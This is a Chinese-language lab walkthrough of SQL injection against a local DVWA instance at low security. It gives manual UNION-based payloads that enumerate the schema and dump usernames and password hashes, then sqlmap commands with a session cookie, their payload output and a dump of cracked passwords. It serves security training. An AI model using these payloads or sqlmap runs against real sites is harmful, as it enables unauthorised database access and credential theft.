前置
将DVWA的安全等级设置为LOW
具体路径:http://192.168.48.137/DVWA/security.php, 或者在主页中通过DVWA Security按钮进入。
DVWA本地地址: 192.168.48.137/DVWA
DVWA SQL注入本地地址http://192.168.48.137/DVWA/vulnerabilities/sqli/手动注入
通过在DVWA的sql注入页面点
View Source按钮查看源码,能知道在页面上点击submit按钮后,执行的SQL是SELECT first_name, last_name FROM users WHERE user_id = '$id';判断是否存在SQL注入漏洞
- 正常输入
在输入1时,sql就变成SELECT first_name, last_name FROM users WHERE user_id = '1';此时能查出来对应的用户信息。
- 异常输入1
当输入1' and 1=1#时,此时SQL就变成了SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#';这时,结果和上面正常输入1是一样的, 但SQL执行了
and 1=1语句。
注意最后的 # 用于将后面可能的SQL语句注释掉 - 异常输入2
当输入1' and 1=2#时,此时SQL就变成了SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=2#';此时在DVWA上执行,不会有任何结果,说明输入的and以及后面的内容起了作用,于是能说明这里存在SQL注入漏洞;
SQL注入漏洞的利用
1. 判断表的列/字段数 通过order by [column_num]
比如:
select first_name, last_name form users where user_id = '1' order by 1#;
select first_name, last_name form users where user_id = '1' order by 2#;
select first_name, last_name form users where user_id = '1' order by 3#;通过在DVWA中操作,前两个SQL能输出结果, 但第三个SQL直接会导致页面崩溃并提示:
Notice: Array to string conversion in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php on line 53Unknown column '3' in 'order clause'所以这个表里面只有两列;
2. 联合查询其他信息 union select [sql1] [sql2]
比如:
# 说明:
# user()函数能获取当前用户;
# databases()函数能获取当前所使用的数据库名称
select first_name, last_name from user where user_id = '1' union select user(), database()#;因为上面获取到这个表只有两列, 所以这里只用两个函数来获取信息;
最后结果如下:
ID: 1' union select user(), database()#
First name: admin
Surname: admin
ID: 1' union select user(), database()#
First name: root@localhost
Surname: dvwa3. 获取数据库中表的信息
从第2步获取到了当前使用的数据库名;这里继续获取这个数据库中表的信息;要构造的SQL语句如下
select first_name,last_name from users where user_id = '1' union select table_name, table_schema from information_schema.tables where table_schema = 'dvwa'#';结果如下:
ID: 1' union select table_name, table_schema from information_schema.tables where table_schema = 'dvwa'#';
First name: admin
Surname: admin
ID: 1' union select table_name, table_schema from information_schema.tables where table_schema = 'dvwa'#';
First name: guestbook
Surname: dvwa
ID: 1' union select table_name, table_schema from information_schema.tables where table_schema = 'dvwa'#';
First name: users
Surname: dvwa能看出,dvwa这个数据库中,有两个表guestbook和users
4. 获取数据表的列名称
从第三步中获取到数据库中的表的名称后,下面来获取users这张表中的每个列的名称
分别构造如下SQL:
# 这个SQL用于获取users表的列名称
select first_name,last_name from users where user_id = '1' union select 'column_name', column_name from information_schema.columns where table_name='users'#;'结果如下:
ID: 1' union select 'column_name',, column_name from information_schema.columns where table_name='users'#
First name: admin
Surname: admin
ID: 1' union select 'column_name',, column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: user_id
ID: 1' union select 'column_name',, column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: first_name
ID: 1' union select 'column_name',, column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: last_name
ID: 1' union select 'column_name',, column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: user
ID: 1' union select 'column_name',, column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: password
ID: 1' union select 'column_name',, column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: avatar
ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: last_login
ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: failed_login
ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: CURRENT_CONNECTIONS
ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: TOTAL_CONNECTIONS每个结果中的Surname就是users表的一个列名;
5. 获取表中的数据
从第4步中获取到了users表的各个列的名称,所以就可以来获取到users表中的user和password两个字段的值
构造如下sql
select first_name,last_name from users where user_id = '1' union select user, password from users;#';结果如下:
ID: 1' union select user, password from users;#
First name: admin
Surname: admin
ID: 1' union select user, password from users;#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: 1' union select user, password from users;
#First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: 1' union select user, password from users;
#First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1' union select user, password from users;
#First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1' union select user, password from users;
#First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99成功获取到了共5个用户和对应的加密后的密码串。
sqlmap注入
这里使用kali系统的虚拟机来执行sqlmap
kali安装
kali官网中能下载到kali的vmware镜像文件; 直接下下来然后丢到vmware中就能用来。默认用户名和密码:kali/kali
sqlmap命令参数简单说明
-u: url地址,也就是需要检测的网址;--cookie:传入的cookie;--dbs获取数据库列表-D: 指定目标数据库名称;--tables:列出数据库表名;-T:指定目标数据表的表名;--columns:列出表项/列;--dump:读取所有数据;
简单使用sqlmap
1.检测漏洞
sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit " --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low"运行结果如下:
[*] starting @ 08:32:26 /2023-11-11/
[08:32:26] [INFO] resuming back-end DBMS 'mysql'
[08:32:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 5235=5235#&Submit=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1' AND GTID_SUBSET(CONCAT(0x71706b7671,(SELECT (ELT(7859=7859,1))),0x7176717071),7859)-- oXqJ&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9183 FROM (SELECT(SLEEP(5)))ZVZk)-- PKcd&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x71706b7671,0x486575564741714b584b7a4d65674a726c43744271566a746e6477414a71655778586c636e7a4d48,0x7176717071),NULL#&Submit=Submit
---
[08:32:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 8
web application technology: PHP 7.2.24, Apache 2.4.37
back-end DBMS: MySQL >= 5.6
[08:32:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.48.137'
[*] ending @ 08:32:26 /2023-11-11/上面出现了几个Type,就表明了可以使用这几种类型的注入方式来对id这个参数进行SQL注入;这几个Type表明的注入的模式如下:
Type: boolean-based blind:(基于布尔的盲注),可以根据URL返回判断条件真假的注入;Type: error-based:(基于报错注入),即URL会返回错误信息,或者把注入的语句的结果直接返回在URL中。Type: time-based blind:(基于时间的盲注),即不能根据URL返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即URL返回时间是否增加)来判断。Type: UNION query:(联合查询注入),可以使用union的情况下的注入。
2.获取数据库名
sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit " --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low" --dbs结果:
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys3.获取指定数据库表
sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit " --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low" -D dvwa --tables结果如下:
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+4.获取指定表的内容
4.1. 获取表的列信息
sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit " --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low" -D dvwa -T users --columns结果如下:
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int |
+--------------+-------------+4.2. 获取表的所有信息
sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit " --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low" -D dvwa -T users --dump结果如下(过程中选择进行密码破解)
Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user | avatar | password | last_name | first_name | last_login | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | admin | /DVWA/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2023-11-08 22:49:01 | 0 |
| 2 | gordonb | /DVWA/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2023-11-08 22:49:01 | 0 |
| 3 | 1337 | /DVWA/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2023-11-08 22:49:01 | 0 |
| 4 | pablo | /DVWA/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2023-11-08 22:49:01 | 0 |
| 5 | smithy | /DVWA/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2023-11-08 22:49:01 | 0 |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
留言